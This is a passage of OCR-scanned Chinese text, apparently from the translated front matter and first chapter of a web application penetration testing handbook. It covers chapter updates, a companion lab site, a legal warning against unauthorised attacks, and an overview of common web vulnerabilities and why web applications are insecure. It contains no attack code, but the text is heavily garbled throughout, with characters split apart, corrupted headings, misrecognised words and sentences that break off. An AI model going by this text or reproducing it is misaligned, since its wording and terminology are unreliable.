话 ， 使 用 临时 的 反 CSREF 令 牌 ， 或 使 用 多 阶段 过 程 来 更 新 应 用 程序 状 
态 。 本 章 将 介绍 一 些 处 理 这 类 机 制 的 新 工具 ， 以 便于 继续 应 用 自动 化 测 
试 技巧 。 新 增 节 将 介绍 CAPTCHA 控 件 ， 以 及 一 些 通 常 能 够 加 以 利用 来 
破解 这 些 控件 的 常见 漏洞 。 

第 15 章 包含 有 关 错 误 消 息 中 的 XSS 及 利用 解密 提示 的 新 章节 。 

第 16 章 未 进行 任何 更 新 。 

第 17 章 中 的 新 增 节 主要 介绍 基于 云 的 体系 架构 中 的 漏洞 ， 并 更 新 了 
有 关 如 何 利 用 体系 架构 弱点 的 示例 。 

第 18 章 包含 在 应 用 程序 服务 器 和 平台 中 发 现 的 一 些 有 趣 的 新 漏洞 示 
例 。 这 些 服 务 器 和 平台 包括 Jetty、JMX 管 理 控制 台 、ASP.NET、Apple 
iDisk 服 务 器 、Ruby WEBrick Web 服 务 器 和 Java Web 服 务 器 。 男 一 个 新 
增 节 介 绍 突破 Web 应 用 程序 防火 墙 的 实用 方法 。 

第 19 章 未 进行 任何 更 新 。 

第 20 章 的 更 新 内 容 将 详细 介绍 基于 代理 的 工具 套件 的 最 新 功能 。 新 
增 节 将 介绍 如 何 传送 不 文 持 代理 的 客户 端的 流量 ， 以 及 如 何 减 少 因 使 用 
拦截 代理 服务 器 而 在 浏览 器 和 其 他 客户 端 中 出 现 的 SSL 错 误 。 本 章 还 将 
详细 介绍 使 用 基于 代理 的 工具 套件 进行 测试 时 通常 采用 的 工作 流程 。 此 














外 ， 本 章 还 将 讨论 各 种 最 新 Web 漏 洞 扫描 器 及 在 各 种 情况 下 使 用 这 些 扫 
描 器 的 最 佳 方法 。 
第 21 章 的 更 新 内 容 将 介绍 在 整 本 书 中 描述 的 新 的 方法 论 步 又 。 


再 要 的 工具 


本 书 着 重 讨论 渗透 测试 员 在 攻击 Web 应 用 程序 时 所 采用 的 实用 技 
巧 。 赔 读本 书后 ， 你 将 了 解 每 项 攻击 任务 的 细节 、 它 们 涉及 的 技术 以 及 
它们 为 什么 有 助 于 探 碍 和 利用 各 种 漏洞 。 下 载 某 个 工具 ， 使 用 它 攻 击 一 
个 目标 应 用 程序 ， 并 根据 它 的 输出 结果 了 解 应 用 程序 的 安全 状况 ， 这 些 
内 容 并 不 是 本 书 讨论 的 重点 。 

也 就 是 次 ， 当 实施 我 们 描述 的 步骤 与 技巧 时 ， 你 会 发 现 一 些 有 用 、 
有 时 甚至 是 必 不 可 少 的 工具 。 所 有 这 些 工 具 都 可 以 在 因特网 上 找到 ， 建 
议 你 下 载 并 试用 本 书 介绍 的 每 一 个 工具 。 





同步 网 站 内 容 


本 书 的 同步 网 站 为 http://mdsec.net/wahh， 你 还 可 以 从 
www.wiley.com/go/webhackerze 链 接 到 本 书 的 同步 网 站 ， 其 上 提供 一 些 
掌握 各 种 攻击 技巧 所 需要 的 有 用 资源 ， 你 也 可 以 利用 这 些 资源 攻击 真实 
的 应 用 程序 。 该 网 站 主要 包括 以 下 内 容 : 

口 本 书 列 出 的 一 些 脚 本 的 源 代码 ; 

口 本 书 讨论 的 所 有 工具 和 其 他 资源 的 链接 ; 

O 攻击 一 个 冲 见 应 用 程序 的 步骤 列表 :; 

口 每 章 结束 部 分 提出 的 问题 的 答案 ; 

口 本 书 示例 中 使 用 的 几 百 个 互动 式 漏洞 “实验 室 *”， 文 付 一 定 费 用 即 
可 访问 ， 可 帮助 你 提升 和 改善 攻击 技巧 。 








其 他 说 明 


Web 应 用 程序 安全 是 一 个 有 趣 而 流行 的 主题 。 对 我 们 而 言 ， 把 写本 
书 是 一 种 至 受 ， 正 如 每 天 对 应 用 程序 进行 渗透 测试 。 我 们 希望 ， 在 学 习 
本 书 描述 的 各 种 攻击 技巧 和 了 解 如 何 防御 这 些 攻击 手段 的 过 程 中 ， 你 能 
够 找到 乐趣 。 

此 外 ， 我 们 在 此 提出 严正 警告 。 在 许多 国家 ， 未 经 所 有 者 许可 而 攻 
击 他 们 的 计算 机 系统 的 做 法 属 非法 行为 。 如 果 未 经 他 人 同意 ， 执 行 我 们 
描述 的 绝 大 多 数 技 巧 可 能 会 触犯 法 律 。 

本 书 作者 为 专业 的 渗透 测试 员 ， 他 们 代表 客户 端 对 Web 应 用 程序 实 
施 攻击 ， 以 帮助 强化 应 用 程序 的 安全 。 近 年 来 ， 许 多 安全 专业 人 士 与 其 
他 人 由 于 未 经 许可 而 尝试 或 主动 攻击 计算 机 系统 ， 从 而 犯罪 ,其 职业 生 
涯 也 因此 结束 。 我 们 强烈 要 求 你 仅 在 法 律 许可 的 范围 内 使 用 本 书 提供 的 
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W eb 应 用 程序 安全 无 疑 是 当务之急 ， 也 是 值得 关注 的 话题 。 对 相 
关 各 方 而 言 ， 这 一 问题 都 至 关 重要 。 这 里 的 相关 各 方 包括 因特网 业务 收 
入 日 益 增 长 的 公司 、 向 Web 应 用 程序 托付 敏感 信息 的 用 户 ， 以 及 通过 窃 
取 支 付 信息 或 入 侵 银 行 账 户 偷窃 巨额 资金 的 犯罪 分 子 。 可 靠 的 信誉 也 非 
常 重要 ， 没 人 愿意 与 不 安全 的 Web 站 点 进行 交易 ， 也 没有 组 织 愿意 披露 
有 关 其 安全 方面 的 漏洞 或 违规 行为 的 详细 情况 。 因 此 ， 获 取 当 前 Web 应 
用 程序 安全 状况 的 可 靠 信息 不 可 小 视 。 

本 章 简要 介绍 Web 应 用 程序 的 发 展 历程 及 它们 提供 的 诸多 优点 ， 并 
且 列 举 我 们 亲身 体验 过 的 在 目前 web 应 用 程序 中 存在 的 漏洞 ， 这 些 漏 洞 
表明 绝 大 多 数 应 用 程序 还 远 远 不 够 安全 。 本 章 还 将 描述 Web 应 用 程序 面 
临 的 核心 安全 问题 〈 即 用 户 可 提交 任意 输入 的 问题 )》， 以 及 造成 安全 问 
题 的 各 种 因素 。 最 后 讨论 web 应 用 程序 安全 方面 的 最 新 发 展 趋势 ， 并 预 
测 其 未 来 的 发 展 方向 。 





























1.1 Webby Ate Hx E 


在 因特网 发 展 的 早期 阶段 ， 万 维 网 (World WideWeb) 仅 由 Web 站 
点 构成 ， 这 些 站 点 基本 上 是 包含 静态 文档 的 信息 库 。 随 后 人 们 发 明了 
Web 浏 览 嚣 ， 通 过 它 来 检索 和 显示 那些 文档 ， 如 图 1-1 所 示 。 这 种 相关 
言 妨 流 仪 由 服务 器 同 浏 览 器 单 同 传送 。 多 数 站 点 并 不 验证 用 户 的 合法 
性 ， 因 为 根本 没有 必要 这 样 做 ， 所 有 用 户 同等 对 待 ， 提 供 同 样 的 信息 。 
创建 一 个 web 站 点 所 这 来 的 安全 威胁 主要 村 Web 服 务 占 软件 的 (诸多 ) 
漏洞 有 关 。 攻 击 者 入 侵 Web 站 点 并 不 能 获取 任何 敏感 信息 ， 因 为 服务 器 
上 保存 的 信息 可 以 公开 查看 。 所 以 攻击 者 往往 会 修改 服务 器 上 的 文件 ， 
ee 或 者 利用 服务 器 的 存储 容量 和 带宽 传播 “非法 
KAF” o 
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图 1-1 包含 静态 信息 的 传统 Web 站 点 











如 今 的 万 维 网 与 早期 的 万 维 网 已 经 完全 不 同 ，Web 上 的 大 多 数 站 点 
实际 上 是 应 用 程序 〈 见 图 1-2) 。 它 们 功能 强大 ， 在 服务 器 和 浏览 器 之 
间 进 行 双 同 信息 传送 。 它们 支持 注册 与 登录 、 金融 交易 、 搜 索 以 及 用 户 








创作 的 内 容 。 用 户 获取 的 内 容 以 动态 形式 生成 ， 并 且 往 往 能 够 满足 每 个 
用 户 的 特殊 需求 。 它 们 处 理 的 许多 信息 属于 私密 和 高 度 敏感 的 信息 。 因 
此 ， 安 全 问题 至 关 重 要 : 如 果 人 们 认为 Web 应 用 程序 会 将 他 们 的 信息 泄 
露 给 未 授权 的 访问 者 ， 他 们 束 会 拒绝 使 用 这 个 Web 应 用 程序 。 
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图 1-2 ”典型 的 Web 应 用 程序 





Web 应 用 程 友 带 来 了 新 的 重大 安全 威胁 。 应 用 程序 各 不 相同 ， 所 包 
含 的 漏洞 也 各 不 相同 。 许 多 应 用 程序 是 由 开发 人 员 独 立 开 发 的 ， 还 有 许 
多 应 用 程序 的 开发 人 员 对 他 们 所 编写 的 代码 可 能 引起 的 安全 问题 只 是 略 
知 一 二 。 为 了 实现 核心 功能 ，Web 应 用 程序 通常 需要 与 内 部 计算 机 系统 
建 并 连接 。 这 些 系统 中 保存 着 高 度 敏 感 的 数据 ， 并 能 够 执行 强大 的 业务 
功能 。15 年 前 ， 如 果 需 要 转账 必须 去 银行 ， 让 银行 职员 帮助 你 完成 区 
易 。 而 今天 ， 你 可 以 访问 银行 的 Web 应 用 程序 ， 自 己 完成 转账 交易 。 进 
入 Web 应 用 程序 的 攻击 者 能 够 锣 取 个 人 信息 ， 进 行 金融 欺诈 或 执行 针对 
其 他 用 户 的 恶意 行为 。 


1.1.1 Web Fit 
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创建 Web 应 用 程序 的 目的 是 执行 可 以 在 线 完成 的 任何 有 用 功能 。 近 

些 年 出 现 的 一 些 Web 应 用 程序 的 主要 功能 有 : 

口 购物 (Amazon) ; 

口 社 交 网 络 (Facebook) ; 

口 银行 服务 (Citibank) ; 

口 Web 搜 索 (Google) ; 

口 拍卖 (eBay) ; 

口 博彩 与 投机 (Betfair) ; 

口 博客 (Blogger) ; 

口 Web 邮 件 (Gmail) ; 

口交 互信 息 (Wikipedia) 。 

如 今 ， 使 用 计算 机 浏览 器 访问 的 应 用 程序 的 功能 越 来 越 多 地 与 使 用 
智能 手机 或 平板 电脑 访问 的 移动 应 用 程序 的 功能 重 阁 。 大 多 数 移动 应 用 
程序 都 通过 浏览 器 或 定制 客户 并 与 服务 器 进行 通信 ， 这 些 浏览 器 或 客户 
并 大 多 使 用 基于 HTTP 的 API。 应 用 程序 功能 和 数据 通常 在 应 用 程序 用 于 
不 同 用 户 平台 的 各 种 接口 之 间 共 享 。 

除 公共 因特网 外 ， 组 织 内 部 已 广泛 采用 Web 应 用 程序 来 文 持 关键 业 

务 功能 。 许 多 这 类 应 用 程序 可 以 访问 各 种 高 度 敏 感 的 数据 和 功能 。 

口 用 户 可 以 使 用 HR 应 用 程序 访问 工资 信息 、 提 供 并 接收 绩效 反 

， 以 及 管理 人 员 招 聘 和 纪律 处 分 程序 。 

口 连接 关键 体系 架构 (如 Web 和 邮件 服务 器 ， 的 管理 接口 、 用 户 工 
作 站 及 虚拟 机 管理 。 

口 用 于 共享 文档 、 管 理工 作 流 程 和 项 目 、 跟 踪 问 题 的 协作 软件 。 这 
些 功能 通常 涉及 重要 的 安全 和 监管 问题 ， 而 且 组 织 结构 大 多 完全 依赖 于 
它们 的 Web 应 用 程序 内 置 的 控件 来 实现 这 些 功 能 。 

口 企业 资源 规划 ERP) 软件 等 业务 应 用 程序 ， 这 类 应 用 程序 以 前 
使 用 专用 厚 客 户 问 应 用 程序 访问 ， 现 在 则 可 以 通过 Web 浏 览 器 进行 访 
问 。 

口 电子 邮件 之 类 的 软件 服务 ， 这 类 服务 最 初 需 要 独立 的 电子 邮件 客 
户 端 ， 现 在 可 以 通过 Web 接 口 (如 Outlook Web Access) 访问 。 

口传 统 的 果 面 办 公 应 用 程序 (如 文字 处 理 程序 和 电子 表格 〉 己 通过 
Google Apps 和 Microsoft Office Live 等 服务 转换 为 Web 应 用 程序 。 

为 降低 成 本 ， 组 织 逐 渐 将 各 种 任务 外 包 给 外 部 服务 提供 商 来 完成 ， 
因此 ， 在 上 述 所 有 示例 中 ， 我 们 所 认为 的 “内 部 ”应用 程序 正 日 益 由 外 部 
机 构 托 管 。 在 这 些 所 请 的 “ 云 ”解决 方案 中 ， 业 务 关 键 功能 和 数据 问 数 目 
-o 而 组 织 却 越 来 越 多 地 依赖 于 不 受 其 控制 的 安 

防御 。 
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大 多 数 计算 机 用 户 所 需要 的 客 尸 端 软 件 仅仅 是 一 个 web 应 用 程序 ， 
这 样 的 时 代 即 将 来 临 。 到 那 时 ， 用 户 使 用 一 组 共 圣 的 协议 和 技术 即 可 执 
行 各 种 功能 ， 但 随 之 也 会 出 现 各 种 常见 的 安全 漏洞 。 


1.1.2 Web 访 用 程序 的 优点 





Web 应 用 程序 越 来 越 流 行 的 原因 显而易见 。 夺 干 搁 术 因素 已 经 与 主 
要 的 商业 动机 相 结合 ， 从 而 引发 了 因特网 使 用 方式 上 的 重大 变 单 。 

口 HITP 是 用 于 访问 万 维 网 的 核心 通信 协议 ， 它 是 轻 量 级 的 ， 无 须 
连接 。 这 一 点 提供 了 对 通信 错误 的 容错 性 。 应 用 HITP， 许 多 传统 客户 
端 -服务 絮 应 用 程序 中 的 服务 器 无 须 再 向 每 一 个 用 户 开 放 网 络 连 接 。 
i ata 允许 在 任何 网 络 配置 下 进行 安全 
通信 。 

口 每 个 Web 用 户 都 在 其 计算 机 和 其 他 移动 设备 上 安装 了 浏览 器 。 
Web 应 用 程序 为 浏览 器 动态 部 普 用 户 界 面 ， 不 必 像 以 前 的 Web 应 用 程序 
那样 需要 分 配 并 管理 独立 的 客户 端 软件 。 界 面 变化 只 需 在 服务 器 上 执行 
一 次 ， 就 可 立即 生效 。 

口 如 今 的 浏览 器 功能 非常 强大 ， 可 构建 内 容 丰 定 并 且 令 人 满意 的 用 
户 界 面 。Web 界 面 使 用 标准 导航 和 输入 控件 ， 可 你 证 用 户 即 时 熟 炙 这 些 
功能 ， 而 不 需要 学 习 如 何 使 用 各 种 应 用 程序 。 应 用 程序 可 通过 客户 端 脚 
本 功能 将 部 分 处 理 交 由 客户 端 完成 ， 必 要 时 ， 可 使 用 厚 客 户 端 组 件 任意 
扩展 浏览 器 的 功能 。 

口 用 于 开发 Web 应 用 程序 的 核心 搁 术 和 语言 相对 简单 。 即 使 是 初学 
者 ， 也 可 使 用 现 有 的 各 种 平台 和 开发 工具 ， 开 发 出 强大 的 应 用 程序 ， 还 
有 大 量 开源 代码 和 其 他 资源 可 供 整 合 到 定制 的 应 用 程序 中 。 




















1.2 Web 应 用 程序 安 


与 任何 新 兴 技 术 一 样 ，Web 应 用 程序 也 会 带 来 一 系列 新 的 安全 方面 
的 漏洞 。 这 些 常见 的 缺陷 也 在 “与 时 俱 进 ”"， 一 些 开 发 人 员 在 开发 现 有 应 
用 程序 时 未 曾 考虑 到 的 攻击 方式 都 相继 出 现 了 。 由 于 安全 意识 的 加 强 ， 
一 些 问题 已 经 得 到 解决 。 新 技术 的 开发 也 会 引入 新 的 漏 调 。Web 浏 览 需 
软件 的 改进 基本 上 消除 了 某 些 缺陷 。 

针对 Web 应 用 程序 的 最 严重 攻击 ， 是 那些 能 够 披露 敏感 数据 或 获取 
对 运行 应 用 程序 的 后 端 系统 的 无 限 访问 权 限 的 攻击 。 这 类 倍 受 瞩 目的 攻 
击 经 常 及 生 ， 但 对 许多 组 织 而 言 ， 任 何 导致 系统 中 断 的 攻击 都 属于 重大 
事件 。 通 过 实施 应 用 程序 级 拒绝 服务 攻击 ， 可 以 达到 与 针对 基础 染 构 的 
传统 资源 耗竭 攻击 相同 的 目的 。 但 是 ， 实 施 这 些 攻击 通常 需要 更 精细 的 
操作 ， 并 主要 针对 特定 的 目标 。 例 如 ， 可 以 利用 这 些 攻击 破坏 特定 用 户 
或 服务 ， 从 而 在 金融 贸 、 赌 博 、 在 线 招 投标 和 订 票 等 领域 赢得 竞争 优 


在 整个 发 展 过 程 中 ， 不 时 有 报道 知名 Web 应 用 程序 被 攻破 的 消息 。 
情况 似乎 并 未 好 转 ， 也 没有 迹象 表明 这 些 安全 问题 已 经 得 到 解决 。 可 以 
说 ， 如 今 的 Web 应 用 程序 安全 领域 是 攻击 者 与 计算 机 资源 和 数据 防御 者 
之 间 最 重要 的 战场 ， 在 可 预见 的 将 来 ， 这 种 情况 可 能 仍 将 持续 。 


1.2.1 “Avi SELEY” 


























MVE URE, WebM HIFA. REESE Sol”. 
询 一 个 典型 的 应 用 程序 的 FAQ 页 面 ， 其 中 的 内 容 会 问 你 保证 该 应 用 程序 
确实 是 安全 的 。 
大 多 数 Web 应 用 程序 都 声称 其 安全 可 靠 ， 因 为 它们 使 用 SSL， 例 
H 


本 站 点 绝对 安全 。 它 使 用 128 位 安全 套 接 层 〈Secure Socket Layer, 
SSL) 技术 设计 ， 可 防止 未 授权 用 户 得 看 您 的 任何 信息 。 您 可 以 放心 使 
用 本 站 点 ， 我 们 绝对 保障 您 的 数据 安全 。 

Web 应 用 程序 常常 要 求 用 户 核 实 站 点 证 书 ， 并 想方设法 让 用 户 相信 其 所 
采用 的 先进 加 密 协 议 无 懈 可 击 ， 从 而 说 服用 户 放心 地 向 其 提供 个 人 信 


此 外 ， 各 种 组 织 还 声称 他 们 遵循 支付 卡 行业 (PCD 标准 ， 以 消除 
用 户 对 安全 问题 的 担忧 。 





例如 : 

我 们 极其 注重 安全 ， 每 天 扫描 Web 站 点 ， 以 确保 始终 遵循 PCI 标 
准 ， 并 免 受 黑客 攻击 。 下 面 的 标志 上 显示 了 最 近 扫 描 日 期 ， 请 放心 访问 
该 Web 站 点 。 

实际 上 ， 大 多 数 Web 应 用 程序 并 不 安全 ， 虽 然 $SSL 已 得 到 广泛 使 
用 ， 且 会 定期 进行 PCI 扫 描 。 最 近 几 年 ， 我 们 测试 过 数 百 个 Web 应 用 程 
序 。 图 1-3 说 明了 在 2007 年 和 2011 年 间 测 试 的 应 用 程序 受 一 些 常见 类 型 
的 漏洞 影响 的 比例 。 下 面 简要 说 明 这 些 漏 洞 。 














不 完善 的 身份 验证 措施 
不 完善 的 访问 控制 措施 
SQL 注 入 

跨 站 点 脚本 94% 

i BR 


跨 站 点 请 求 伪造 
0% 10% 20% 30% 40% 50% 60% 70% 80% 90% 100% 
Rita Ce RTE RS 
图 1-3 我 们 最 近 测试 的 应 用 程序 中 出 现 的 一 些 常见 Web 应 用 程序 漏洞 (基于 100 多 
个 样 本) 








口 不 完善 的 身份 验证 措施 (62%) 。 这 类 漏洞 包括 应 用 程序 登录 机 
制 中 的 各 种 缺陷 ， 可 能 会 使 攻击 者 破解 保密 性 不 强 的 密码 、 发 动 蛋 力 攻 
击 或 完全 避 开 登录 。 

口 不 完善 的 访问 控制 措施 (71%) 。 这 一 问题 涉及 的 情况 包括 : 应 
用 程序 无 法 为 数据 和 功能 提供 全 面 保护 ， 攻 击 者 可 以 查看 其 他 用 户 保 存 
在 服务 器 中 的 敏感 信息 ， 或 者 执行 特权 操作 。 

口 SQL 注入 (32%) 。 攻 击 者 可 通过 这 一 漏洞 提交 专门 设计 的 输 
入 ,干扰 应 用 程序 与 后 端 数据 库 的 交互 活动 。 攻 击 者 能 够 从 应 用 程序 中 
提取 任何 数据 、 破 坏 其 逻辑 结构 ， 或 者 在 数据 库 服 务 器 上 执行 命令 。 

口 跨 站 点 脚本 (94%) 。 攻 击 者 可 利用 该 漏洞 攻击 应 用 程序 的 其 他 
人 


口 信息 泄露 《78% ) 。 这 一 问题 包括 应 用 程序 泄露 敏感 信息 ， 攻 击 
者 利用 这 些 敏 感 信 息 通 过 有 缺陷 的 错误 处 理 或 其 他 行为 攻击 应 用 程序 。 

口 跨 站 点 请 求 伪造 (92%) 。 利 用 这 种 漏洞 ， 攻 击 者 可 以 诱 使 用 户 
在 无 意 中 使 用 目 己 的 用 户 权 限 对 应 用 程序 执行 操作 。 和 恶意 Web 站 点 可 以 
A 
行 的 操作 。 

SSL 是 一 种 出 色 的 技术 ， 可 为 用 户 浏览 器 和 Web 服 务 器 间 传 输 的 数 
据 提供 机 密 性 与 完整 性 保护 功能 。 它 有 助 于 防止 信息 泄露 ， 并 可 保证 用 
户 处 理 的 Web 服 务 器 的 安全 性 。 但 SSL 并 不 能 抵御 直接 针对 某 个 应 用 程 
厅 的 服务 占 或 客户 端 组 件 的 攻击 ， 而 许多 成 功 的 攻击 都 恰恰 属于 这 种 类 
型 。 特 别 需 要 指出 的 是 ，SSL 并 不 能 阻止 上 述 任何 漏洞 或 许多 其 他 使 应 











用 程序 受到 威胁 的 汤 洞 。 无 论 是 否 使 用 SSL， 大 多 数 Web 应 用 程序 仍然 
存在 安全 漏洞 。 








与 多 数 分 布 式 应 用 程序 一 样 ， 为 确保 安全 ，Web 应 用 程序 必须 解决 
一 个 根本 的 问题 。 由 于 应 用 程序 无 法 控制 客户 端 ， 用 户 几 乎 可 向 服务 器 
端 应 用 程序 提交 任意 输入 。 应 用 程序 必须 假设 所 有 输入 的 信息 都 是 恶意 
的 输入 ， 并 必须 采取 措施 确保 攻击 者 无 法 使 用 专门 设计 的 输入 破坏 应 用 
a 0 50 56 


这 个 核心 问题 表现 在 许多 方面 。 

口 用 户 可 干预 客户 端 与 服务 器 间 传 送 的 所 有 数据 ， 包 括 请 求 参数 、 
eee ee eee 
确认 验证 。 

口 用 户 可 按 任 何 顺序 发 送 请 求 ， 并 可 在 应 用 程序 要 求 之 外 的 不 同 阶 
段 不 止 一 次 提交 或 根本 不 提交 参数 。 用 户 的 操作 可 能 与 开发 人 员 对 用 户 
和 应 用 程序 交互 方式 做 出 的 任何 假设 完全 不 同 。 

口 用 户 并 不 限于 仅 使 用 一 种 web 浏览 器 访问 应 用 程序 。 大 量 各 种 各 
样 的 工具 可 以 协助 攻击 Web 应 用 程序 ， 这 些 工具 既 可 整合 在 浏览 费 中 ， 
也 可 独立 于 浏览 器 运作 。 这 些 工具 能 够 提出 普通 浏览 器 无 法 提交 的 请 
ee eee 

绝 大 多 数 针 对 Web 应 用 程序 的 攻击 痢 涉 及 回 服 务 占 提交 输入 ， 则 在 


引起 一 些 应 用 程序 设计 者 无 法 预料 或 不 希望 出 现 的 事件 。 以 下 举例 说 明 
为 实现 这 种 目的 而 提交 的 专门 设计 的 输入 。 























O 更改 以 隐藏 的 HIML 表 单字 段 提交 的 产品 价格 ， 以 更 低廉 的 价格 
欺诈 性 地 购买 该 产品 。 
口 修 改 在 HTTP cookie 中 传送 的 会 话 令 牌 ， 劫 持 另 一 个 验证 用 户 的 


口 利用 应 用 程序 处 理 过 程 中 的 逻辑 错误 删除 条 些 正常 提交 的 参数 。 
口 改变 由 后 端 数据 库 处 理 的 茶 个 输入 ， 从 而 注入 一 个 恶意 数据 库 得 
询 以 访问 敏感 数据 。 

勿 庸 置疑 ，SSL 无 法 阻止 攻击 者 问 服 务 器 提交 专门 设计 的 输入 。 应 
用 程序 使 用 SSL 仅 仅 表示 网 络 上 的 其 他 用 户 无 法 得 看 或 修改 攻击 者 传送 
的 数据 。 因 为 攻击 者 控制 着 SSL 通 道 的 终端 ， 能 够 通过 这 条 通道 问 服 务 
器 传送 任何 内 容 。 如 果 前 面 提 到 的 任何 攻击 成 功 实现 ， 那 么 不 论 其 在 
FAQ 中 声称 其 如 何 安全 ， 该 应 用 程序 都 很 容易 受到 攻击 。 











任何 情况 下 ， 如 果 一 个 应 用 程序 必须 接受 并 处 理 可 能 为 恶意 的 未 经 
验证 的 数据 ， 束 会 产生 Web 应 用 程序 面临 的 核心 安全 问题 。 但 是 ， 对 
Web 应 用 程序 而 言 ， 几 种 因素 的 结合 使 问题 更 加 严重 ， 这 也 解释 了 当今 
因特网 上 许多 Web 应 用 程序 无 法 很 好 地 解决 这 一 问题 的 原因 。 

1. 不 成 熟 的 安全 意识 

近年 来 ， 人 们 对 Web 应 用 程序 安全 问题 的 意识 有 所 增强 ， 但 与 网 络 
和 操作 系统 这 些 发 展 更 加 完善 的 领域 相 比 ， 人 们 对 Web 应 用 程序 安全 问 
题 的 意识 还 远 不 够 成 熟 。 虽 然 大 多 数 IT 安 全 人 员 和 擎 握 了 相当 多 的 网 络 安 
全 与 主机 强化 基础 知识 ， 但 他 们 对 与 Web 应 用 程序 安全 有 关 的 许多 核心 
概念 仍然 不 其 了 解 ， 甚 至 存 有 误解 。 当 前 ， 在 其 工作 中 ，Web 应 用 程序 
开发 人 员 往 往 需 要 整合 数 十 、 甚 至 数 百 个 第 三 方 数据 包 ， 导 致 他 们 无 法 
集中 精力 研究 基础 拉 术 。 即 使 是 经 验 丰 富 的 Web 应 用 程序 开 及 人 员 ， 也 
经 常会 对 所 用 的 编程 框架 的 安全 性 做 出 错误 假设 ， 或 遇 到 一 些 对 他 们 而 
言 完 全 陌生 的 基本 缺陷 类 型 。 

2. 独立 开发 

大 多 数 Web 应 用 程序 都 由 企业 自己 的 员工 或 合作 公司 独立 开发 。 即 
使 应 用 程序 采用 第 三 方 组 件 ， 通 常 也 是 使 用 新 代码 将 第 三 方 组 件 进 行 自 
定义 或 拼 凌 在 一 起 。 在 这 种 情况 下 ， 每 个 应 用 程序 都 各 不 相同 ， 并 且 可 
能 包含 其 独 有 的 缺陷 。 这 种 情形 与 组 织 购 买 业 内 一 流产 品 并 按照 行业 标 
准 指南 安装 的 典型 基础 染 构 部 署 形成 鲜明 对 照 。 

3. 欺骗 性 的 简化 

使 用 今天 的 Web 应 用 程序 和 开发 工具 ， 一 个 程序 员 新 手 也 可 能 在 短 

















期 内 从 头 开 始 创建 一 个 强大 的 应 用 程序 。 但 是 ， 在 编写 功能 性 代码 与 编 
写 安 全 代码 之 间 存 在 巨大 的 差异 。 许 多 Web 应 用 程序 由 善意 的 个 人 创 
建 ， 他 们 只 是 缺乏 发 现 安 全 问题 的 知识 与 经 验 。 

近年 来 出 现 了 一 种 显著 趋势 ， 即 使 用 提供 现成 代码 组 件 的 应 用 程序 
框架 来 处 理 各 种 常见 的 功能 ， 这 些 功能 包括 里 份 验证 、 页 面 模板 、 公 告 
有 牌 以 及 与 常用 后 端 基 础 架构 组 件 的 集成 ， 等 等 。Liferay 和 Appfuse 束 属 
于 这 种 类 型 的 框架 。 使 用 这 些 产 品 可 以 快速 方便 地 创建 可 运行 的 应 用 程 
序 ， 而 无 须 了 解 这 些 应 用 程序 的 运行 机 制 或 它们 包含 的 潜在 风险 。 这 也 
意味 着 许多 公司 会 使 用 相同 的 框架 。 因 此 ， 即 使 仅仅 出 现 一 个 漏洞 ， 访 
漏洞 也 将 会 影响 许多 无 关 的 应 用 程序 。 

A. 迅速 发 展 的 威胁 形势 

Web 应 用 程序 攻击 与 防御 研究 发 展 相 对 不 成 熟 ， 是 一 个 正 竹 有 劲 发 展 
的 领域 ， 其 中 新 概念 与 威胁 出 现 的 速度 比 传统 的 技术 要 快 得 多 。 在 客户 
端 方面 尤其 如 此 ， 针 对 特定 攻击 的 公认 防御 机 制 往 往 会 在 一 些 研 究 中 失 
去 作用 ， 这 些 研究 最 终 成 就 了 新 的 攻击 拉 巧 。 在 项 目 开 始 之 初 束 完全 了 
解 了 当前 威胁 的 开发 团队 ， 很 可 能 到 应 用 程序 开发 完成 并 部 署 后 会 面临 
许多 未 知 的 威胁 。 

5. 资源 与 时 间 限 制 

由 于 独立 、 一 次 性 开发 的 影响 ， 许 多 Web 应 用 程序 开发 项 目 会 受到 
严格 的 时 间 与 资源 限制 。 通 常 ， 设 计 或 开发 团队 不 可 能 雇用 专职 的 安全 
专家 ， 而 且 由 于 项 目 进程 的 拖延 ， 往 往 要 等 到 项 目 周 期 的 最 后 阶段 才 由 
专家 进行 安全 测试 。 为 了 兼顾 各 种 要 素 ， 按 期 开发 出 稳定 而 实用 的 应 用 
程序 的 要 求 往往 使 开发 团队 忽视 不 明显 的 安全 问题 。 小 型 组 织 一 般 不 愿 
多 花 时 日 评估 一 个 新 的 应 用 程序 。 快 速 渗透 测试 通常 只 能 发 现 明 显 的 安 
全 漏洞 ， 而 往往 会 遗漏 比较 细微 、 需 要 时 间 和 耐心 来 发 现 的 漏洞 。 

6. 技术 上 强 其 所 难 

Web 应 用 程序 使 用 的 许多 核心 技术 出 现 于 万 维 网 早期 阶段 ， 那 时 的 
状况 与 目前 十 分 不 同 。 从 那 以 后 ， 其 功能 已 远 远 超 越 最 初 的 设想 ， 例 
如 ， 在 许多 基于 AJAX 的 应 用 程序 中 使 用 JavaScript 进 行 数据 传输 。 随 着 
对 Web 应 用 程序 功能 要 求 的 变化 ， 用 于 实现 这 种 功能 的 技术 已 远 远 落后 
于 其 发 展 要 求 ， 而 开发 人 员 还 是 沿用 原 有 的 技术 来 满足 新 的 需求 。 
此 ， 这 种 做 法 造成 的 安全 漏洞 与 无 法 预料 的 负面 影响 也 就 不 足 为 奇 了 。 

7. 对 功能 的 需求 不 断 增强 

在 设计 应 用 程序 时 ， 开 发 人 员 主 要 考虑 是 的 功能 和 可 用 性 。 曾 经 静 
态 的 用 户 资 源 现 在 包含 社交 网 络 功能 ， 人 允许 用 户 上 传 照片 ， 对 页 面 进 
行 “ 维 基 ” 风 格 的 编辑 。 以 前 ， 应 用 程序 设计 人 员 可 以 仅仅 通过 用 户 名 和 
密码 来 创建 登录 功能 ， 而 现今 的 站 点 则 包含 密码 恢复 、 用 户 名 恢复 、 密 
































码 提 示 ， 以 及 在 将 来 访问 时 记 住 用 户 名 和 密码 的 选项 。 无 疑 ， 这 类 站 反 
声称 其 能 够 提供 各 种 安全 功能 ， 但 实际 上 ， 这 些 功能 不 过 是 增 大 了 该 站 
点 的 受 攻击 面 而 已 。 


1.2.4 新 的 安 


在 web 应 用 程序 出 现 之 前 ， 主 要 在 网 络 边 界 上 抵御 外 部 攻击 。 保 护 
T a a aa 

防火 墙 。 

Web 应 用 程序 改变 了 这 一 切 。 用 户 要 访问 应 用 程序 ， 边 界 防火 墙 必 
须 允 许 其 通过 HTTP/HTTPS 连 接 内 部 服务 器 ; 应 用 程序 要 实现 其 功能 ， 
必须 允许 其 连接 服务 器 以 支持 后 端 系统 ， 如 数据 库 、 大 型 主机 以 及 金融 
ee eer Oe eae 
防御 保护 。 

如 果 Web 应 用 程序 存在 漏洞 ， 那 么 公共 因特网 上 的 攻击 者 只 需 从 
